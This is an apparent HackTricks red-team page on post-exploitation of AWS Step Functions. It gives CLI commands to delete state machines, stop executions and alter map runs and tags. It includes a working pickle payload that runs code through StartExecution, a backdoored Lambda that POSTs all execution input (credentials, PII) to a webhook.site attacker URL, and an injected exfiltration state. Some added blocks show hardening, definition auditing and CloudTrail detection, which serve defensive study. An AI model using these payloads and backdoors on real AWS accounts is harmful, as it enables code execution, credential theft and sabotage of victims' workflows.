AWS - Step Functions Post Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Step Functions

For more information about this AWS service, check:

AWS - Step Functions Enum

states:RevealSecrets

This permission allows revealing secret data inside an execution. It is exercised through the TestState API (aws stepfunctions test-state), which tests a single state definition with a role you supply: the inspection level must be set to TRACE and the revealSecrets parameter to true, and the caller must hold states:RevealSecrets; otherwise the secret values used by the state (for example credentials for service integrations) are left out of the test output.

states:DeleteStateMachine, states:DeleteStateMachineVersion, states:DeleteStateMachineAlias

An attacker with these permissions could permanently delete state machines, their versions, and their aliases. This can disrupt critical workflows, cause data loss, and require significant time to recover and restore the affected state machines. It also lets the attacker cover their tracks, hamper forensic investigation, and potentially impact operations by removing key automation processes and state configuration.

Note

  • Deleting a state machine also deletes all of its associated versions and aliases.
  • Deleting a state machine alias does not delete the state machine versions that alias references.
  • A state machine version that is currently referenced by one or more aliases cannot be deleted (the aliases must be deleted or repointed first).
# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
# Delete state machine version
aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
  • Potential impact: disruption of critical workflows, data loss, and operational downtime.

states:UpdateMapRun

An attacker with this permission could tamper with the failure configuration and parallelism settings of a Map Run (the child-execution batch created by a Distributed Map state), raising or lowering the maximum number of concurrent child workflow executions and thereby directly affecting throughput. The attacker could also change the tolerated failure percentage and count, for example lowering them to 0 so that a single failed item fails the whole Map Run, which in turn fails the state machine execution and disrupts the workflow.

aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
  • Potential impact: degraded performance and disruption of critical workflows.

states:StopExecution

An attacker with this permission can stop the execution of any state machine, interrupting in-flight workflows and processes. This can lead to incomplete transactions, halted business operations, and potential data corruption.

Warning

This action is not supported for Express state machines.

aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
  • Potential impact: disruption of in-flight workflows, halted operations, and potential data corruption.

states:TagResource, states:UntagResource

An attacker can add, modify, or remove tags on Step Functions resources, disrupting the organization's cost allocation, resource tracking, and any tag-based (ABAC) access control policies that depend on them.

aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>

Potential impact: broken cost allocation, resource tracking, and tag-based access control policies.


states:StartExecution -> Input Injection Into Dangerous Sinks

states:StartExecution is a data-plane entry point. If the state machine passes attacker-controlled input into a task that has a dangerous sink (for example a Lambda that does pickle.loads(base64.b64decode(payload_b64))), StartExecution can sometimes be turned into code execution and secret exfiltration through the execution output, without any permission to update the state machine.

Discover the workflow and the Lambda it invokes

With states:List* / states:Describe* you can enumerate state machines and read a state machine definition:

REGION=us-east-1
SM_ARN="<state_machine_arn>"

aws stepfunctions describe-state-machine --region "$REGION" --state-machine-arn "$SM_ARN" --query definition --output text

If you also have lambda:GetFunction, you can download the Lambda code bundle (get-function returns a short-lived presigned URL) to see how the input is processed and confirm whether unsafe deserialization is present:

LAMBDA_ARN="<lambda_arn_from_definition>"
CODE_URL="$(aws lambda get-function --region "$REGION" --function-name "$LAMBDA_ARN" --query 'Code.Location' --output text)"
curl -sSL "$CODE_URL" -o /tmp/lambda.zip
unzip -o /tmp/lambda.zip -d /tmp/lambda_code >/dev/null
ls -la /tmp/lambda_code

Example: crafted pickle in the execution input (Python)

If the Lambda unpickles attacker-controlled data, a malicious pickle executes code during deserialization. Example payload that evaluates a Python expression in the Lambda runtime:

PAYLOAD_B64="$(python3 - <<'PY'
import base64, pickle

class P:
    # pickle serialises a reference to eval plus the string; pickle.loads
    # calls eval(<string>) on the victim side, no class needed there.
    def __reduce__(self):
        # Replace with a safe proof (e.g. "1+1") or a target-specific read.
        return (eval, ("__import__('os').popen('id').read()",))

print(base64.b64encode(pickle.dumps(P())).decode())
PY
)"

EXEC_ARN="$(aws stepfunctions start-execution --region "$REGION" --state-machine-arn "$SM_ARN" --input "{\"payload_b64\":\"$PAYLOAD_B64\"}" --query executionArn --output text)"
aws stepfunctions describe-execution --region "$REGION" --execution-arn "$EXEC_ARN" --query output --output text

Impact: every permission of the task role (Secrets Manager reads, S3 writes, KMS decrypt, etc.) becomes reachable through crafted input, and the results can be returned in the Step Functions execution output.
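To make the sink and the payload above concrete, here is an added example (not code from the page) that puts the vulnerable Lambda handler next to a hardened one and runs the crafted pickle through both. The handler names, the ALLOWED_SCHEMA fields and the environment-variable marker used as a safe proof of execution are assumptions; in a real Lambda the eval runs with the task role's permissions.

```python
# Added example (not the page's code): the dangerous sink described above,
# pickle.loads(base64.b64decode(payload_b64)), beside a hardened handler, and
# the crafted pickle that turns states:StartExecution into code execution.
# Handler names, ALLOWED_SCHEMA and the env-var marker are assumptions.
import base64
import json
import os
import pickle


def vulnerable_handler(event, context=None):
    """The sink the text describes: the execution-input field is base64-decoded
    and unpickled, so whatever callable the pickle's __reduce__ names runs
    here, with the task role's permissions."""
    obj = pickle.loads(base64.b64decode(event["payload_b64"]))
    return {"result": repr(obj)}


# Assumed legitimate payload shape: a data-only JSON document.
ALLOWED_SCHEMA = {"order_id": str, "quantity": int}


def hardened_handler(event, context=None):
    """Same input field, parsed as JSON and checked against an allow-list of
    keys and exact types. Pickle bytes are not valid UTF-8/JSON, so they are
    rejected before any object is constructed."""
    raw = base64.b64decode(event["payload_b64"], validate=True)
    try:
        data = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("payload is not JSON") from exc
    if not isinstance(data, dict) or set(data) != set(ALLOWED_SCHEMA):
        raise ValueError("unexpected payload keys")
    for key, typ in ALLOWED_SCHEMA.items():
        if type(data[key]) is not typ:  # exact match: bool is not accepted as int
            raise ValueError(f"bad type for {key}")
    return {"result": data}


def craft_payload(python_expr):
    """Attacker side: a pickle whose __reduce__ hands builtins.eval the
    expression, base64-encoded into the field the sink reads. Only the
    reference to eval and the string are serialised, so the victim needs no
    Gadget class for the payload to fire."""
    class Gadget:
        def __reduce__(self):
            return (eval, (python_expr,))
    blob = base64.b64encode(pickle.dumps(Gadget())).decode()
    return {"payload_b64": blob}  # this dict is the --input of start-execution


def legit_event():
    """Constructed benign execution input in the same envelope."""
    doc = json.dumps({"order_id": "A1", "quantity": 2}).encode()
    return {"payload_b64": base64.b64encode(doc).decode()}


def demo():
    """Prove execution offline: the expression sets an env-var marker instead
    of reading secrets. Returns (ran in vulnerable handler, blocked by hardened)."""
    marker = "__import__('os').environ.__setitem__('SFN_PICKLE_RAN', '1')"
    evt = craft_payload(marker)
    vulnerable_handler(evt)  # eval() fires inside pickle.loads
    ran = os.environ.get("SFN_PICKLE_RAN") == "1"
    try:
        hardened_handler(evt)
        blocked = False
    except ValueError:
        blocked = True
    return ran, blocked


if __name__ == "__main__":
    print(demo())  # (True, True)
```

The hardening point is not the type check itself but the format: a data-only format (JSON) plus an explicit schema can never instantiate arbitrary objects, whereas any pickle.loads on input that a StartExecution caller controls is remote code execution under the task role, regardless of what the rest of the workflow looks like.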

states:UpdateStateMachine, lambda:UpdateFunctionCode

An attacker who gains control of a user or role with the following permissions:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowUpdateStateMachine",
      "Effect": "Allow",
      "Action": "states:UpdateStateMachine",
      "Resource": "*"
    },
    {
      "Sid": "AllowUpdateFunctionCode",
      "Effect": "Allow",
      "Action": "lambda:UpdateFunctionCode",
      "Resource": "*"
    }
  ]
}

…can carry out a high-impact, stealthy post-exploitation attack by combining Lambda backdooring with Step Function logic manipulation.

This scenario assumes the victim uses AWS Step Functions to orchestrate workflows that process sensitive input such as credentials, tokens, or PII.

Example victim invocation:

aws stepfunctions start-execution \
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim

If the Step Function is configured to invoke a Lambda such as LegitBusinessLogic, the attacker can proceed with either of two stealthy attack techniques:


Update the Lambda function

The attacker replaces the code of the Lambda function the Step Function already invokes (LegitBusinessLogic) so that it silently exfiltrates the input data. The handler below only shows the exfiltration part; if the attacker can also read the current code (lambda:GetFunction), the stealthier option is to add the exfiltration call to the existing logic rather than replace it, so the workflow keeps producing its normal output.

# send_to_attacker.py
# Standard library only: the Lambda Python runtime does not bundle requests.
import json
import urllib.request

def lambda_handler(event, context):
    # Forward the whole execution input (credentials, tokens, PII...) to the attacker.
    req = urllib.request.Request(
        "https://webhook.site/<attacker-id>/exfil",
        data=json.dumps(event).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    urllib.request.urlopen(req, timeout=3).read()
    return {"status": "exfiltrated"}
zip function.zip send_to_attacker.py

# Module and function name must match the target's configured handler
# (aws lambda get-function-configuration --function-name LegitBusinessLogic --query Handler).
aws lambda update-function-code \
--function-name LegitBusinessLogic \
--zip-file fileb://function.zip --profile attacker

Add a malicious state to the Step Function

Alternatively, the attacker can inject an exfiltration state at the start of the workflow by updating the Step Function definition. Suppose the legitimate definition currently deployed is:

{
  "StartAt": "OriginalState",
  "States": {
    "OriginalState": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
      "End": true
    }
  }
}

The attacker writes a backdoored definition (malicious_state_definition.json) that first hands the full input to an attacker-controlled Lambda and then continues to the original state, so the workflow still produces the same final result and the victim is unlikely to notice the difference:

{
  "Comment": "Backdoored for Exfiltration",
  "StartAt": "ExfiltrateSecrets",
  "States": {
    "ExfiltrateSecrets": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:SendToAttacker",
      "InputPath": "$",
      "ResultPath": "$.exfil",
      "Next": "OriginalState"
    },
    "OriginalState": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
      "End": true
    }
  }
}

aws stepfunctions update-state-machine \
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
--definition file://malicious_state_definition.json --profile attacker

Two details matter for stealth. "ResultPath": "$.exfil" merges the exfiltration task's output into the state passed on to OriginalState, so LegitBusinessLogic now receives an extra exfil key; setting "ResultPath": null discards that output and forwards the original input unchanged. And the Comment field is visible to anyone who reads the definition, so in practice an attacker would keep the original comment (or none) rather than label the backdoor.
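As an added example (not code from the page), the same injection done programmatically, with ResultPath set to null so the original state receives its input unchanged, followed by the two checks a defender can run on a live definition pulled with aws stepfunctions describe-state-machine --query definition: a diff against the known-good definition and an account check on every Task resource ARN. The account ID and ARNs are placeholders.

```python
# Added example (not the page's code): the ASL backdoor above built
# programmatically, plus the checks a defender would run on the live
# definition. The account ID and ARNs are placeholders.
import copy
import json
import re

VICTIM_ACCOUNT = "111111111111"  # assumed victim account ID
LEGIT_ARN = f"arn:aws:lambda:us-east-1:{VICTIM_ACCOUNT}:function:LegitBusinessLogic"
EXFIL_ARN = f"arn:aws:lambda:us-east-1:{VICTIM_ACCOUNT}:function:SendToAttacker"

# Known-good definition, e.g. the one checked into IaC.
ORIGINAL = {
    "StartAt": "OriginalState",
    "States": {
        "OriginalState": {"Type": "Task", "Resource": LEGIT_ARN, "End": True},
    },
}


def inject_exfil_state(definition, exfil_arn, name="ExfiltrateSecrets"):
    """Attacker side: prepend a Task that receives the whole input ($) and
    whose result is discarded (ResultPath null), so the original first state
    still gets exactly the input it always did. "$.exfil" instead would add
    an extra key that the downstream Lambda could notice."""
    backdoored = copy.deepcopy(definition)
    if name in backdoored["States"]:
        raise ValueError(f"state {name} already exists")
    backdoored["States"][name] = {
        "Type": "Task",
        "Resource": exfil_arn,
        "InputPath": "$",
        "ResultPath": None,  # json.dumps emits null
        "Next": backdoored["StartAt"],
    }
    backdoored["StartAt"] = name
    return backdoored


_ARN_ACCOUNT = re.compile(r"^arn:aws:[a-z0-9-]+:[a-z0-9-]*:(\d{12}):")


def task_resources(definition):
    """(state name, target) for every Task: the direct Lambda ARN form used on
    this page, or FunctionName under Parameters for the optimized
    arn:aws:states:::lambda:invoke integration."""
    for name, state in definition["States"].items():
        if state.get("Type") != "Task":
            continue
        res = state.get("Resource", "")
        if res.endswith(":lambda:invoke"):
            res = state.get("Parameters", {}).get("FunctionName", res)
        yield name, res


def audit_definition(known_good, live, trusted_accounts):
    """Defender side: diff the live definition (describe-state-machine) against
    the known-good one, and flag Task targets whose ARN names an account
    outside trusted_accounts. Bare function names resolve in the same account
    and are not flagged."""
    findings = {
        "start_changed": live["StartAt"] != known_good["StartAt"],
        "added_states": sorted(set(live["States"]) - set(known_good["States"])),
        "removed_states": sorted(set(known_good["States"]) - set(live["States"])),
        "foreign_resources": [],
    }
    for name, target in task_resources(live):
        m = _ARN_ACCOUNT.match(target)
        if m and m.group(1) not in trusted_accounts:
            findings["foreign_resources"].append((name, target))
    return findings


if __name__ == "__main__":
    live = inject_exfil_state(ORIGINAL, EXFIL_ARN)
    print(json.dumps(live, indent=2))  # contents of malicious_state_definition.json
    print(audit_definition(ORIGINAL, live, {VICTIM_ACCOUNT}))
```

Note that the page's backdoor points at a Lambda inside the victim's own account, so the account check alone would not catch it; only the diff against a known-good definition does. The account check catches the lazier variant where the exfiltration Lambda lives in the attacker's account.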


Victim setup (exploit context)

  • A Step Function (LegitStateMachine) is used to process sensitive user input.
  • It invokes one or more Lambda functions, for example LegitBusinessLogic.

Potential impact:

  • Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
  • No visible errors or failures in the workflow execution.
  • Hard to detect without reviewing the Lambda code or the execution traces.
  • Enables long-term persistence if the backdoor stays in the code or in the ASL logic.
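Although executions keep succeeding, the UpdateStateMachine and UpdateFunctionCode calls used above (and the delete, update-map-run, stop-execution and tag calls earlier on this page) are management API calls that CloudTrail records. The following added example (not from the page) runs detection logic over constructed CloudTrail records; the records, account ID, principal ARNs and the deployer allow-list are made up. It flags watched Step Functions and Lambda events from non-deployer principals and escalates when one principal both rewrote a state machine and pushed Lambda code within a short window.

```python
# Added example (not from the page): detection logic for the control-plane
# actions this page abuses, run over constructed CloudTrail records. The
# records, account ID, principal ARNs and the deployer allow-list are made up.
import json
from datetime import datetime

# eventSource -> eventNames that rewrite or destroy workflow logic. Lambda
# event names in CloudTrail carry the API version suffix.
WATCHED = {
    "states.amazonaws.com": {
        "UpdateStateMachine", "DeleteStateMachine", "DeleteStateMachineVersion",
        "DeleteStateMachineAlias", "UpdateMapRun", "StopExecution",
        "TagResource", "UntagResource",
    },
    "lambda.amazonaws.com": {"UpdateFunctionCode20150331v2"},
}
# requestParameters keys that name the affected resource, by action family.
TARGET_KEYS = ("stateMachineArn", "stateMachineVersionArn", "stateMachineAliasArn",
               "functionName", "executionArn", "mapRunArn", "resourceArn")
# Principals allowed to change workflow logic (the CI/CD role), assumed.
DEPLOY_PRINCIPALS = {"arn:aws:sts::111111111111:assumed-role/ci-deploy/github"}

# Constructed CloudTrail records (one JSON object per line), not real telemetry.
SAMPLE_TRAIL = """\
{"eventTime":"2024-05-01T10:00:00Z","eventSource":"states.amazonaws.com","eventName":"UpdateStateMachine","awsRegion":"us-east-1","userIdentity":{"arn":"arn:aws:iam::111111111111:user/contractor"},"requestParameters":{"stateMachineArn":"arn:aws:states:us-east-1:111111111111:stateMachine:LegitStateMachine"}}
{"eventTime":"2024-05-01T10:00:05Z","eventSource":"lambda.amazonaws.com","eventName":"UpdateFunctionCode20150331v2","awsRegion":"us-east-1","userIdentity":{"arn":"arn:aws:iam::111111111111:user/contractor"},"requestParameters":{"functionName":"LegitBusinessLogic"}}
{"eventTime":"2024-05-01T10:01:00Z","eventSource":"states.amazonaws.com","eventName":"UpdateStateMachine","awsRegion":"us-east-1","userIdentity":{"arn":"arn:aws:sts::111111111111:assumed-role/ci-deploy/github"},"requestParameters":{"stateMachineArn":"arn:aws:states:us-east-1:111111111111:stateMachine:LegitStateMachine"}}
{"eventTime":"2024-05-01T10:02:00Z","eventSource":"states.amazonaws.com","eventName":"StartExecution","awsRegion":"us-east-1","userIdentity":{"arn":"arn:aws:iam::111111111111:user/contractor"},"requestParameters":{"stateMachineArn":"arn:aws:states:us-east-1:111111111111:stateMachine:LegitStateMachine"}}
"""


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect(trail_text, deploy_principals=DEPLOY_PRINCIPALS):
    """One finding per watched event; high severity unless the principal is a
    known deployer. StartExecution is data-plane use and is not watched here."""
    findings = []
    for line in trail_text.strip().splitlines():
        ev = json.loads(line)
        if ev["eventName"] not in WATCHED.get(ev["eventSource"], ()):
            continue
        principal = ev.get("userIdentity", {}).get("arn", "<unknown>")
        params = ev.get("requestParameters") or {}
        target = next((params[k] for k in TARGET_KEYS if k in params), "<none>")
        findings.append({
            "time": ev["eventTime"], "action": ev["eventName"],
            "principal": principal, "target": target,
            "severity": "info" if principal in deploy_principals else "high",
        })
    return findings


def correlate(findings, window_seconds=600):
    """The combination from this section: the same non-deployer principal both
    rewrote a state machine and pushed Lambda code within the window."""
    seen = {}
    for f in findings:
        if f["severity"] == "high":
            seen.setdefault(f["principal"], {})[f["action"]] = _ts(f["time"])
    critical = []
    for principal, actions in seen.items():
        a = actions.get("UpdateStateMachine")
        b = actions.get("UpdateFunctionCode20150331v2")
        if a and b and abs((a - b).total_seconds()) <= window_seconds:
            critical.append(principal)
    return critical


if __name__ == "__main__":
    fs = detect(SAMPLE_TRAIL)
    for f in fs:
        print(f)
    print("critical:", correlate(fs))
```

The deployer allow-list is what keeps this usable: legitimate pipelines update state machines and function code constantly, so the signal is a change made by a principal that is not the pipeline, and the pair of changes within minutes is the signature of the attack described here.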
